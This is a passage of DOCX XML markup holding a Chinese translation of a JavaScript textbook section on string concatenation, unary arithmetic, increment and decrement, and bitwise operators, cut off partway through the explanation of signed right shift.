        <w:t>NaN:undefined</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>后做加法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>最后，需要特别注意的是，当加号运算符和字符串和数字一起使用时，需要考虑加法的结合性的对运算顺序的影响。也就是说，运算结果是依赖于运算符的运算顺序的，比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1+2+"blind mice";//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"3 blind mice"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1+(2+"blind mice");//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"12 blind mice"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第一行没有圆括号，</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符具有从左至右的结合性，因此两个数字首先进行加法计算，计算结果和字符串进行连接。在第二行中，圆括号改变了运算顺序：数字</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>和字符串连接，生成一个新字符串，然后数字</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>和这个新字符</w:t>
      </w:r>
      <w:r>
        <w:t>串再次连接，生成了最终结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="4_8_2_Yi_Yuan_Suan_Zhu_Yun_Suan_Fu_"/>
      <w:r>
        <w:t>4.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　一元算术运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一元运算符作用于一个单独的操作数，并产生一个新值。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，一元运算符具有很高的优先级，而且都是右结合（</w:t>
      </w:r>
      <w:r>
        <w:t>right-associative</w:t>
      </w:r>
      <w:r>
        <w:t>）。本节将讲述一元算术运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>++</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>），必要时，它们会将操作数转换为数字。需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“-”</w:t>
      </w:r>
      <w:r>
        <w:t>是一元运算符，也是二元运算符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面介绍一元算术运算符：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一元加法</w:t>
      </w:r>
      <w:r>
        <w:t>(+)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一元加法运算符把操作数转换为数字（或者</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>），并返回这个转换后的数字。如果操作数本身就是数字，则直接返回这个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一元减法（</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>“-”</w:t>
      </w:r>
      <w:r>
        <w:t>用做一元运算符时，它会根据需要把操作数转换为数字，然后改变运算结果的符号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>递增（</w:t>
      </w:r>
      <w:r>
        <w:t>++</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>递增</w:t>
      </w:r>
      <w:r>
        <w:t>“++”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符对其操作数进行增量（加一）操作，操作数是一个左值（</w:t>
      </w:r>
      <w:r>
        <w:t>lvalue</w:t>
      </w:r>
      <w:r>
        <w:t>）（变量、数组元素或对象属性）。运算符将操作数转换为数字，然后给数字加</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，并将加</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>后的数值重新赋值给变量、数组元素或者对象属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>递增</w:t>
      </w:r>
      <w:r>
        <w:t>“++”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的返回值依赖于它相对于操作数的位置。当运算符在操作数</w:t>
      </w:r>
      <w:r>
        <w:t>之前，称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>前增量</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>pre-increment</w:t>
      </w:r>
      <w:r>
        <w:t>）运算符，它对操作数进行增量计算，并返回计算后的值。当运算符在操作数之后，称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后增量</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>post-increment</w:t>
      </w:r>
      <w:r>
        <w:t>）运算符，它对操作数进行增量计算，但返回未做增量计算的（</w:t>
      </w:r>
      <w:r>
        <w:t>unincremented</w:t>
      </w:r>
      <w:r>
        <w:t>）值。思考一下如下两行代码之间的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i=1,j=++i;//i</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t>的值都是</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i=1,j=i++;//i</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，表达式</w:t>
      </w:r>
      <w:r>
        <w:t>++x</w:t>
      </w:r>
      <w:r>
        <w:t>并不总和</w:t>
      </w:r>
      <w:r>
        <w:t>x=x+1</w:t>
      </w:r>
      <w:r>
        <w:t>完全一样，</w:t>
      </w:r>
      <w:r>
        <w:t>“++”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符从不进行字符串连接操作，它总是会将操作数转换为数字并增</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是字符串</w:t>
      </w:r>
      <w:r>
        <w:t>“1”</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>++x</w:t>
      </w:r>
      <w:r>
        <w:t>的结果就是数字</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:t>x+1</w:t>
      </w:r>
      <w:r>
        <w:t>是字符串</w:t>
      </w:r>
      <w:r>
        <w:t>“11”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>同样需要注意的是，由于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会自动进行分号补全，因此不能在后增量运算符和操作数之间插入换行符。如果插入了换行符，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将会把操作数当做一条单独的语句，并在其之前补上一个分号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不管是前增量还是后增量，这个运算符通常用在</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环中，用于控制循环内的计数器（见</w:t>
      </w:r>
      <w:r>
        <w:t>5.5.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>递减（</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>递减</w:t>
      </w:r>
      <w:r>
        <w:t>“-”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的操作数也是一个左值。它把操作数转换为数字，然后减</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，并将计算后的值重新赋值给操作数。和</w:t>
      </w:r>
      <w:r>
        <w:t>“++”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符一样，递减</w:t>
      </w:r>
      <w:r>
        <w:t>“--”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的返回值依赖于它相对操作数的位置，当递减运算符在操作数之前，操作数减</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>并返回减</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>之后的值。当递减运算符在操作数之后，操作数减</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>并返回减</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>之前的值。当递减运算符在操作符的右侧时，运算符和操作数之间不能有换行符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="4_8_3_Wei_Yun_Suan_Fu_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　位运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>位运算符可以对由数字表示的二进制数据进行更低层级的按位运算。尽管它们并不是传统的数学运算，但这里也将其归类为算术运算符，因为它们作用于数值</w:t>
      </w:r>
      <w:r>
        <w:t>类型的操作数并返回数字。这些运算符在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>编程中并不常用，如果你对十进制整数的二进制表示并不熟悉的话，你可以跳过本节内容。这里的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个运算符都是对操作数的每个位进行布尔运算，这里将操作数的每个位当做布尔值（</w:t>
      </w:r>
      <w:r>
        <w:t>1=true</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>0=false</w:t>
      </w:r>
      <w:r>
        <w:t>），其他三个位运算符用来进行左移位和右移位。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>位运算符要求它的操作数是整数，这些整数表示为</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>位整型而不是</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:t>位浮点型。必要时，位运算符首先将操作数转换为数字，并将数字强制表示为</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>位整型，这会忽略原格式中的小数部分和任何超过</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>位的二进制位。移位运算符要求右操作数</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t>之间。在将其操作数转换为无符号</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>位整数后，它们将舍弃第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>位之后的二进制位，以便生成一个位数正确的数字。需要注意的是，位运算符会将</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>-Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>都转换为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>按位与（＆）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>位运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>对它的整型操作数逐位执行布尔与（</w:t>
      </w:r>
      <w:r>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:t>）操作。只有两个操作数中相对应的位都是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，结果中的这一位才是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>0x1234</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>0x00FF=0x0034</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>按位或（</w:t>
      </w:r>
      <w:r>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>位运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“|”</w:t>
      </w:r>
      <w:r>
        <w:t>对它的整型操作数逐位执行布尔或（</w:t>
      </w:r>
      <w:r>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t>）操作。如果其中一个操作数相应的位为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，或者两个操作数相应位都是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，那</w:t>
      </w:r>
      <w:r>
        <w:t>么结果中的这一位就为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。例如：</w:t>
      </w:r>
      <w:r>
        <w:t>0x1234|0x00FF=0x12FF</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>按位异或（</w:t>
      </w:r>
      <w:r>
        <w:t>^</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>位运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“|”</w:t>
      </w:r>
      <w:r>
        <w:t>对它的整型操作数逐位执行布尔异或（</w:t>
      </w:r>
      <w:r>
        <w:t>XOR</w:t>
      </w:r>
      <w:r>
        <w:t>）操作。异或是指第一个操作数为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>或第二个操作数为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，但两者不能同时为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果两个操作数中只有一个相应位为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>（不能同时为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>），那么结果中的这一位就是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>0xFF00^0xF0F0=0x0FF0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>按位非（～）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是一元运算符，位于一个整型参数之前，它将操作数的所有位取反。根据</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中带符号的整数的表示方法，对一个值使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符相当于改变它的符号并减</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。例如，～</w:t>
      </w:r>
      <w:r>
        <w:t>0x0F=0xFFFFFFF0</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>-16</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>左移（＜＜）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将第一个操作数的所有二进制位进行左移操作，移动的位数由第二个操作数指定，移动的位数是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。例如，在表达式</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＜＜</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>的第一位变成了第二位，</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>的第二位变成了它的第三位，以此类推。新的第一位用</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>来补充，舍弃第</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>位。将一个值左移</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>位相当于它乘以</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>，左移两位相当于乘以</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>，以此类推。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>＜＜</w:t>
      </w:r>
      <w:r>
        <w:t>2=28</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>带符号右移（＞＞）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＞＞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>将第一个操作数的所有位进行右移操作，移动的位数由第二个操作</w:t>
      </w:r>
      <w:r>
        <w:t>数指定，移动的位数是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。右边溢出的位将忽略。填补在左边的位由原操作数的符号决定，以便保持结果的符号与原操作数一致。如果第一个操作数是正数，移位后用</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>填补最高位；如果第一个操作数是负的，移位后就用</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>填补高位。将一个值右移</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>位，相当于用它除以</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>（忽略余数），右移两位，相当于它除以</w:t>
      </w:r>
      <w:r>
